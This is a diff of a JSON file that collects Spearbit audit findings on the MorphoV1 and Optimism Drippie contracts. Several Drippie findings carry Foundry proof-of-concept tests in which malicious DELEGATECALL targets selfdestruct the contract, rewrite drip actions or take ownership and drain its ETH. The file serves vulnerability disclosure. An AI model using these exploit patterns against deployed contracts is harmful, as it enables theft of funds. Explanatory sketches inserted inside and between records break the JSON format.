"Avoid shadowing state variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Shadowing state or global variables could lead to potential bugs if the developer does not treat them carefully. To avoid any possible problem, every local variable should avoid shadowing a state or global variable name.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Governance setter functions do not check current state before updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "In MorphoGovernance.sol, many of the setter functions allow the state to be changed even if it is already set to the passed-in argument. For example, when calling setP2PDisabled, there are no checks to see if the _poolToken is already disabled, i.e. unnecessary state changes are not prevented.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Emit event for amount of dust used to cover withdrawals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Consider emitting an event that includes the amount of dust that was covered by the contract balance. A couple of ways this could be used: Trigger an alert whenever it exceeds a certain threshold so you can inspect it, and pause if a bug is found or a threshold is exceeded.
Use this value as part of your overall balance accounting to verify everything adds up.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Break up long functions into smaller composable functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "A few functions are 100+ lines of code, which makes it more challenging to initially grasp what the function is doing. You should consider breaking these up into smaller functions, which would make it easier to grasp the logic of the function, while also enabling you to easily unit test the smaller functions.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Remove unused struct members", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The HealthFactorVars struct contains three attributes, but only the userMarkets attribute is ever set or used. The unused attributes should be removed to increase code readability.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Remove unused struct", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "There is an unused struct BorrowAllowedVars. This should be removed to improve code readability.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "No validation check on prices fetched from the oracle", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Currently, in the liquidateLogic function, when fetching the borrowedTokenPrice and collateralPrice from the oracle, the return value is not validated. This is due to the fact that the underlying protocol does not do this check either, but that should not deter Morpho from performing validation checks on prices fetched from oracles. Also, this check is done in the Compound PositionsManager.sol here, so for code consistency it should also be done in Aave-v2.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "onBehalf argument can be set as the Morpho protocols address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "When calling the supplyLogic function, the _onBehalf argument currently allows a user to supply funds on behalf of the Morpho protocol itself. While this does not seem exploitable, it can still be a cause for user error and should not be allowed.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "maxSortedUsers has no upper bounds validation and is not the same in Compound/Aave-2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "In MorphoGovernance.sol, the maxSortedUsers setter has no upper bound put in place. The maxSortedUsers value is the number of users to sort in the data structure.
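A minimal sketch of a bounded setter; MaxSortedUsersCannotBeZero mirrors the existing Aave-v2 check noted below, while the upper-bound constant and second error are illustrative:

    function setMaxSortedUsers(uint256 _newMaxSortedUsers) external onlyOwner {
        if (_newMaxSortedUsers == 0) revert MaxSortedUsersCannotBeZero();
        // hypothetical upper bound; keeps matching-engine iteration gas bounded
        if (_newMaxSortedUsers > MAX_SORTED_USERS_UPPER_BOUND) revert MaxSortedUsersTooLarge();
        maxSortedUsers = _newMaxSortedUsers;
        emit MaxSortedUsersSet(_newMaxSortedUsers);
    }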
Also, while this function has the MaxSortedUsersCannotBeZero() check in Aave-v2, the Compound version is missing this same error check.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Consider adding the compound revert error code inside Morpho custom error to better track the revert reason", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "On Compound, when an error condition occurs, usually (except in extreme cases) the transaction is not reverted; instead an error code (code != 0) is returned. Morpho correctly reverts with a custom error when this happens, but it does not report the error code returned by Compound. By tracking the error code as an event parameter, Morpho could better monitor when and why interactions with Compound are failing.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "liquidationThreshold variable name can be misleading", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The liquidationThreshold name in Aave is a percentage. The values.liquidationThreshold variable used in Morpho's _getUserHealthFactor is in \"value units\" like debt: values.liquidationThreshold = assetCollateralValue.percentMul(assetData.liquidationThreshold);.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Users can be liquidated on Morpho at any time when the deprecation flag is set by governance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "Governance can set a deprecation flag on Compound and Aave markets, and users on these markets can be liquidated by anyone even if they're sufficiently over-collateralized. Note that this deprecation flag is independent of Compound's own deprecation flags and can be applied to any market.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Refactor _computeP2PIndexes to use InterestRateModel's functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MorphoV1-Spearbit-Security-Review.pdf", + "body": "The InterestRatesManager contracts' _computeP2PIndexes functions currently reimplement the interest rate model from the InterestRatesModel functions.", + "labels": [ + "Spearbit", + "MorphoV1", + "Severity: Informational" + ] + }, + { + "title": "Permitting Multiple Drip Calls Per Block", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The inline comments correctly note that reentrancy is possible and permitted when state.config.interval is 0. We are currently unaware of use cases where this is desirable. Reentrancy is one risk; flashbot bundles are a similar risk where the drip may be called multiple times by the same actor in a single block. A malicious actor may abuse this ability, especially if interval is misconfigured as 0 due to JavaScript type coercion.
A reentrant call or flashbot bundle may be used to frontrun an owner attempting to archive a drip or attempting to withdraw assets.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Medium Risk" + ] + }, + { + "title": "Version Bump to Latest", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "During the review, a new version of Solidity was released with an important bugfix.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "DOS from External Calls in Drippie.executable / Drippie.drip", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "In both the executable and drip (which also calls executable) functions, the Drippie contract interacts with some external contract via low-level calls. The external call could revert or fail with an Out of Gas exception, causing the entire drip to fail. The severity is low because in the case where a drip reverts due to a misconfigured or malicious dripcheck or target, the drip can still be archived and a new one can be created by the owner.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Use call.value over transfer in withdrawETH", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "transfer is no longer recommended as a default due to unpredictable gas cost changes in future evm hard forks (see here for more background.) While useful to use transfer in some cases (such as sending to an EOA or a contract which does not process data in the fallback or receive functions), this particular contract does not benefit: withdrawETH is already owner-gated and is not at risk of reentrancy as the owner already has permission to drain the contract's ether in a single call should they choose. (A call-based sketch is given below.)", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Input Validation Checks for Drippie.create", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Drippie.create does not validate input, potentially leading to unintended results. The function should check: _name is not an empty string, to avoid creating a drip that could not be read on a frontend UI. _config.dripcheck should not be address(0), otherwise executable will always revert. _config.actions.length should be at least one (_config.actions.length > 0) to prevent creating drips that do nothing when executed. DripAction.target should not be address(0) to prevent burning ETH or interacting with the zero address during drip execution.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Ownership Initialization and Transfer Safety on Owned.setOwner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Consider the following scenarios. Scenario 1 Drippie allows the owner to be both initialized and set to address(0). If this scenario happens, nobody will be able to manage the Drippie contract, thus preventing any of the following operations: Creating a new drip Updating a drip's status (pausing, activating or archiving a drip) If set to the zero address, all the onlyOwner operations in AssetReceiver and Transactor will be uncallable.
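Referring back to the withdrawETH item above, a minimal sketch of the call-based pattern; the function and event shapes are assumed from context:

    function withdrawETH(address payable _to) external onlyOwner {
        uint256 amount = address(this).balance;
        // call forwards all available gas instead of transfer's fixed 2300 stipend
        (bool success, ) = _to.call{ value: amount }("");
        require(success, "AssetReceiver: ETH transfer failed"); // message illustrative
        emit WithdrewETH(msg.sender, _to, amount); // event shape assumed
    }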
This scenario where the owner can be set to address(0) can occur when address(0) is passed to the constructor or setOwner. Scenario 2 owner may be set to address(this). Given the static nature of DripAction.target and DripAction.data, there is no benefit of setting owner to address(this), and all instances can be assumed to have been done so in error.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Unchecked Return and Handling of Non-standard Tokens in AssetReceiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The current AssetReceiver contract implements \"direct\" ETH and ERC20 token transfers, but does not cover edge cases like non-standard ERC20 tokens that do not: revert on failed transfers; adhere to the ERC20 interface (i.e. no return value). An ERC20 token that does not revert on failure would cause the WithdrewERC20 event to emit even though no transfer took place. An ERC20 token that does not have a return value will revert even if the call would have otherwise been successful. Solmate libraries already used inside the project offer a utility library called SafeTransferLib.sol which covers such edge cases. Be aware of the developer comments in the natspec: /// @dev Use with caution! Some functions in this library knowingly create dirty bits at the destination of the free memory pointer. /// @dev Note that none of the functions in this library check that a token has code at all! That responsibility is delegated to the caller.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "AssetReceiver Allows Burning ETH, ERC20 and ERC721 Tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "AssetReceiver contains functions that allow the owner of the contract to withdraw ETH, ERC20 and ERC721 tokens. Those functions allow specifying the receiver address of the ETH, ERC20 and ERC721 tokens, but they do not check that the receiver address is not address(0). By not doing so, those functions allow one to: Burn ETH if sent to address(0). Burn ERC20 tokens if sent to address(0) and the ERC20 _asset allows tokens to be burned via transfer (for example, Solmate's ERC20 allows that; OpenZeppelin's instead will revert if the recipient is address(0)). Burn ERC721 tokens if sent to address(0) and the ERC721 _asset allows tokens to be burned via transferFrom (for example, both the Solmate and OpenZeppelin implementations prevent sending the _id to address(0), but you don't know if that is still true for custom ERC721 contracts that do not use those libraries).", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "AssetReceiver Not Implementing onERC721Received Callback Required by safeTransferFrom.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "AssetReceiver contains the function withdrawERC721 that allows the owner to withdraw ERC721 tokens.
As stated in the EIP-721, the safeTransferFrom (used by the sender to transfer ERC721 tokens to the AssetReceiver) will revert if the target contract (AssetReceiver in this case) is not implementing onERC721Received and returning the expected value bytes4(keccak256(\"onERC721Received(address,address,uint256,bytes)\")).", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Both Transactor.CALL and Transactor.DELEGATECALL Do Not Emit Events", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Transactor contains \"general purpose\" DELEGATECALL and CALL functions that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both of those functions execute delegatecall and call without emitting any events. Because of the general-purpose nature of these functions, it would be considered a good security measure to emit events to track the functions' usage. Those events could then be used to monitor and track usage by external monitoring services.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Both Transactor.CALL and Transactor.DELEGATECALL Do Not Check the Result of the Execution", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The Transactor contract contains \"general purpose\" DELEGATECALL and CALL functions that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both functions return the delegatecall and call result back to the caller without checking whether the execution was successful or not. By not implementing such a check, the transaction could fail silently. Another side effect is that the ETH sent along with the execution (both functions are payable) would remain in the Drippie contract and not be transferred to the _target. Test example showcasing the issue: contract Useless { // A contract that has no functions // No fallback functions // Will not accept ETH (only from selfdestruct/coinbase) } function test_transactorCALL() public { Useless useless = new Useless(); bool success; vm.deal(deployer, 3 ether); vm.deal(address(drippie), 0 ether); vm.deal(address(useless), 0 ether); vm.prank(deployer); // send 1 ether via `call` to a contract that cannot receive them (success, ) = drippie.CALL{value: 1 ether}(address(useless), \"\", 100000, 1 ether); assertEq(success, false); vm.prank(deployer); // Perform a `call` to a non-existing target function (success, ) = drippie.CALL{value: 1 ether}(address(useless), abi.encodeWithSignature(\"notExistingFn()\"), 100000, 1 ether); assertEq(success, false); assertEq(deployer.balance, 1 ether); assertEq(address(drippie).balance, 2 ether); assertEq(address(useless).balance, 0);
} function test_transactorDELEGATECALL() public { Useless useless = new Useless(); bool success; vm.deal(deployer, 3 ether); vm.deal(address(drippie), 0 ether); vm.deal(address(useless), 0 ether); vm.prank(deployer); // send 1 ether via `delegatecall` to a contract that cannot receive them (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), \"\", 100000); assertEq(success, false); vm.prank(deployer); // Perform a `delegatecall` to a non-existing target function (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), abi.encodeWithSignature(\"notExistingFn()\"), 100000); assertEq(success, false); assertEq(deployer.balance, 1 ether); assertEq(address(drippie).balance, 2 ether); assertEq(address(useless).balance, 0); }", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Transactor.DELEGATECALL Data Overwrite and selfdestruct Risks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The Transactor contract contains a \"general purpose\" DELEGATECALL function that allows the owner to execute a delegatecall toward a target address passing an arbitrary payload. Consider the following scenarios: Scenario 1 A malicious target contract could selfdestruct the Transactor contract and, as a consequence, the contract that is inheriting from Transactor. Test example showcasing the issue: contract SelfDestroyer { function destroy(address receiver) external { selfdestruct(payable(receiver)); } } function test_canOwnerSelftDestructDrippie() public { // Assert that Drippie exists assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED); assertGt(getContractSize(address(drippie)), 0); // set it to active vm.prank(deployer); drippie.status(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE); assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE); // fund the drippie with 1 ETH vm.deal(address(drippie), 1 ether); uint256 deployerBalanceBefore = deployer.balance; uint256 drippieBalanceBefore = address(drippie).balance; // deploy the destroyer SelfDestroyer selfDestroyer = new SelfDestroyer(); vm.prank(deployer); drippie.DELEGATECALL(address(selfDestroyer), abi.encodeWithSignature(\"destroy(address)\", deployer), gasleft()); uint256 deployerBalanceAfter = deployer.balance; uint256 drippieBalanceAfter = address(drippie).balance; // assert that the deployer has received the balance that was present in Drippie assertEq(deployerBalanceAfter, deployerBalanceBefore + drippieBalanceBefore); assertEq(drippieBalanceAfter, 0); // Weird things happen with forge // Because we are in the same block the code of the contract is still > 0 so // Cannot use assertEq(getContractSize(address(drippie)), 0); // Known forge issue // 1) Forge resets storage var to 0 after self-destruct (before tx ends) 2654 -> https://github.com/foundry-rs/foundry/issues/2654 // 2) selfdestruct has no effect in test 1543 -> https://github.com/foundry-rs/foundry/issues/1543 assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED); } Scenario 2 The delegatecall allows the owner to intentionally, or accidentally, overwrite the content of the drips mapping.
By being able to modify the drips mapping, a malicious user would be able to execute a series of actions like: Changing a drip's status: Activating an archived drip; Deleting a drip by changing the status to NONE (this allows the owner to entirely override the drip by calling create again); Switching an active/paused drip to paused/active; etc. Changing a drip's interval: Preventing a drip from being executed any more by setting interval to a very high value; Allowing a drip to be executed more frequently by lowering the interval value; Enabling reentrancy by setting interval to 0. Changing a drip's actions: Overriding an action to send the drip contract's balance to an arbitrary address; etc. Test example showcasing the issue: contract ChangeDrip { address public owner; mapping(string => Drippie.DripState) public drips; function someInnocentFunction() external { drips[\"FUND_BRIDGE_WALLET\"].config.actions[0] = Drippie.DripAction({ target: payable(address(1024)), data: new bytes(0), value: 1 ether }); } } function test_canDELEGATECALLAllowReplaceAction() public { vm.deal(address(drippie), 10 ether); vm.deal(address(attacker), 0 ether); // Create an action with name \"FUND_BRIDGE_WALLET\" that has the function // to fund a wallet vm.startPrank(deployer); string memory fundBridgeWalletName = \"FUND_BRIDGE_WALLET\"; Drippie.DripAction[] memory actions = new Drippie.DripAction[](1); // The first action will send Alice 1 ether actions[0] = Drippie.DripAction({ target: payable(address(alice)), data: new bytes(0), value: 1 ether }); Drippie.DripConfig memory config = createConfig(100, IDripCheck(address(checkTrue)), new bytes(0), actions); drippie.create(fundBridgeWalletName, config); drippie.status(fundBridgeWalletName, Drippie.DripStatus.ACTIVE); vm.stopPrank(); // Deploy the malicious contract vm.prank(attacker); ChangeDrip changeDripContract = new ChangeDrip(); // make the owner of drippie call via DELEGATECALL an innocent function of the exploiter contract vm.prank(deployer); drippie.DELEGATECALL(address(changeDripContract), abi.encodeWithSignature(\"someInnocentFunction()\"), 1000000); // Now the drip action should have changed, anyone can execute it and funds would be sent to // the attacker and not to the bridge wallet drippie.drip(fundBridgeWalletName); // Assert we have drained Drippie assertEq(attacker.balance, 1 ether); assertEq(address(drippie).balance, 9 ether); } Scenario 3 Calling a malicious contract or accidentally calling a contract which does not account for Drippie's storage layout can result in owner being overwritten. Test example showcasing the issue: contract GainOwnership { address public owner; function someInnocentFunction() external { owner = address(1024); } } function test_canDELEGATECALLAllowOwnerLoseOwnership() public { vm.deal(address(drippie), 10 ether); vm.deal(address(attacker), 0 ether); // Deploy the malicious contract vm.prank(attacker); GainOwnership gainOwnershipContract = new GainOwnership(); // make the owner of drippie call via DELEGATECALL an innocent function of the exploiter contract vm.prank(deployer); drippie.DELEGATECALL(address(gainOwnershipContract), abi.encodeWithSignature(\"someInnocentFunction()\"), 1000000);
// Assert that the attacker has gained ownership assertEq(drippie.owner(), attacker); // Steal all the funds vm.prank(attacker); drippie.withdrawETH(payable(attacker)); // Assert we have drained Drippie assertEq(attacker.balance, 10 ether); assertEq(address(drippie).balance, 0 ether); }", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Use calldata over memory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Some gas savings if function arguments are passed as calldata instead of memory.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Gas Optimization" + ] + }, + { + "title": "Avoid String names in Events and Mapping Key", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Drip events emit an indexed nameref and the name as a string. These strings must be passed into every drip call, adding to gas costs for larger strings.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Gas Optimization" + ] + }, + { + "title": "Avoid Extra sloads on Drippie.status", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Information for emitting the event can be taken from calldata instead of reading from storage. Can skip repeat drips[_name].status reads from storage.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Gas Optimization" + ] + }, + { + "title": "Use Custom Errors Instead of Strings", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "To save some gas, the use of custom errors leads to cheaper deploy time cost and run time cost. The run time cost is only relevant when the revert condition is met.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Gas Optimization" + ] + }, + { + "title": "Increment In The For Loop Post Condition In An Unchecked Block", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "This is only relevant if you are using the default Solidity checked arithmetic. i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } }", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Gas Optimization" + ] + }, + { + "title": "DripState.count Location and Use", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "DripState.count is recorded and never used within the Drippie or IDripCheck contracts.
+ { + "title": "DripState.count Location and Use", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "DripState.count is recorded and never used within the Drippie or IDripCheck contracts. DripState.count is also incremented after all external calls, inconsistent with the Checks, Effects, Interactions convention.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Type Checking Foregone on DripCheck", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Passing params as bytes makes for a flexible DripCheck; however, type checking is lost.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Confirm Blind ERC721 Transfers are Intended", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "AssetReceiver uses transferFrom instead of safeTransferFrom. The callback on safeTransferFrom often poses a reentrancy risk, but in this case the function is restricted to onlyOwner.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Code Contains Empty Blocks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "It is best practice that when there is an empty block, a comment is added in the block explaining why it is empty. While empty blocks are not technically errors, they can cause confusion when reading code.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Code Structure Deviates From Best-Practice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The best-practice layout for a contract should follow this order: state variables, events, modifiers, constructor, functions. Function ordering helps readers identify which functions they can call and find constructor and fallback functions more easily. Functions should be grouped according to their visibility and ordered as: constructor, receive function (if exists), fallback function (if exists), external, public, internal, private. Some constructs deviate from this recommended best-practice: structs and mappings after events.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Missing or Incomplete NatSpec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Some functions are missing @notice/@dev NatSpec comments for the function, @param for all/some of their parameters and @return for return values. Given that NatSpec is an important part of code documentation, this affects code comprehension, auditability and usability.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Checking Boolean Against Boolean", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "executable returns a boolean, in which case the comparison to true is unnecessary. executable also reverts if any precondition check fails, in which case false will never be returned. A minimal sketch follows this entry.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + },
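A minimal sketch of the simplification suggested by the "Checking Boolean Against Boolean" entry above (the require strings are taken from the report; the rewrite is this writeup's suggestion):

// Current pattern: executable either returns true or reverts, so `== true` is dead weight.
require(executable(_name) == true, "Drippie: drip cannot be executed at this time, try again later");
// Equivalent and slightly cheaper:
require(executable(_name), "Drippie: drip cannot be executed at this time, try again later");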
+ { + "title": "Drippie.executable Never Returns false Only true or Reverts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The executable function implemented in the Drippie contract has the following signature: executable(string memory _name) public view returns (bool). From the signature and the NatSpec documentation (@return True if the drip is executable, false otherwise), a user/developer would expect, without reading the code, that the function returns true if all the checks pass and false otherwise; in reality the function will always return true or revert. Because of this behavior, a drip that does not pass the requirements inside executable will never revert with the message present in the following code, executed by the drip function: require( executable(_name) == true, \"Drippie: drip cannot be executed at this time, try again later\" );", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Drippie Use Case Notes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Drippie intends to support use cases outside of the initial hot EOA top-up use case demonstrated by Optimism. To further clarify, we've noted that drips support: sending ETH; external function calls with fixed params; preconditions. Examples include conditionally transferring ETH or tokens, or calling an admin function iff preconditions are met. Drips do not support: updating the drip contract storage; altering params; postconditions. Examples include vesting contracts or executing Uniswap swaps based on recent moving averages (which are not without their own risks). Where dynamic params or internal accounting is needed, a separate contract needs to be paired with the drip.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Augment Documentation for dripcheck.check Indicating Precondition Check Only Performed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Before executing the whole batch of actions, the drip function calls executable, which checks whether the drip can be executed. Inside executable an external contract is called by this instruction: require( state.config.dripcheck.check(state.config.checkparams), \"Drippie: dripcheck failed so drip is not yet ready to be triggered\" ); Optimism provided some examples, like checking whether a target balance is below or above a specific threshold, but in general the dripcheck.check invocation could perform any kind of checks. The important part that should be clear in the NatSpec documentation of the drip function is that this specific check is performed only once, before the execution of the whole batch of actions.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Considerations on the drip state.last and state.config.interval values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "When the drip function is called by an external actor, executable is executed to check whether the drip meets all the requirements needed to be executed. The only check that is done regarding the drip's state.last and state.config.interval is this: require( state.last + state.config.interval <= block.timestamp, \"Drippie: drip interval has not elapsed since last drip\" ); state.last is never really initialized when the create function is called; this means that it will be automatically initialized with the default value of the uint256 type: 0.
Consideration 1: Drips could be executed as soon as created. Depending on the value set for state.config.interval, the executable logic implies that as soon as a drip is created, it can be immediately (even in the same transaction) executed via the drip function. Consideration 2: A very high value for interval could make the drip never executable. block.timestamp represents the number of seconds that have passed since Unix Time (1970-01-01T00:00:00Z). When the owner of the Drippie contract wants to create a \"one shot\" drip that can be executed immediately after creation but only once (even if the owner forgets to set the drip's status to ARCHIVED), he/she should be aware that the maximum value that can be used for the interval is block.timestamp. This means that the second time the drip can be executed is after block.timestamp seconds have passed. If, for example, the owner creates right now a drip with interval = block.timestamp, then after the first execution the same drip could only be executed again after ~52 years (~2022-1970).", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Support ERC1155 in AssetReceiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "AssetReceiver supports the ERC20 and ERC721 interfaces but not ERC1155.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Reorder DripStatus Enum for Clarity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The current implementation of the Drippie contract has the following enum type: enum DripStatus { NONE, // uint8(0) ACTIVE, PAUSED, ARCHIVED } When a drip is created via the create function, its status is initialized to PAUSED (equal to uint8(2)), and when it gets activated its status is changed to ACTIVE (equal to uint8(1)). So, the status changes from 0 (NONE) to 2 (PAUSED) to 1 (ACTIVE). Switching the order of PAUSED and ACTIVE inside the enum DripStatus definition would make it cleaner and easier to understand.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "_gas is Unneeded as Transactor.CALL and Transactor.DELEGATECALL Function Argument", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The caller (i.e. contract owner) can control the desired amount of gas at the transaction level.", + "labels": [ + "Spearbit", + "OptimismDrippie", + 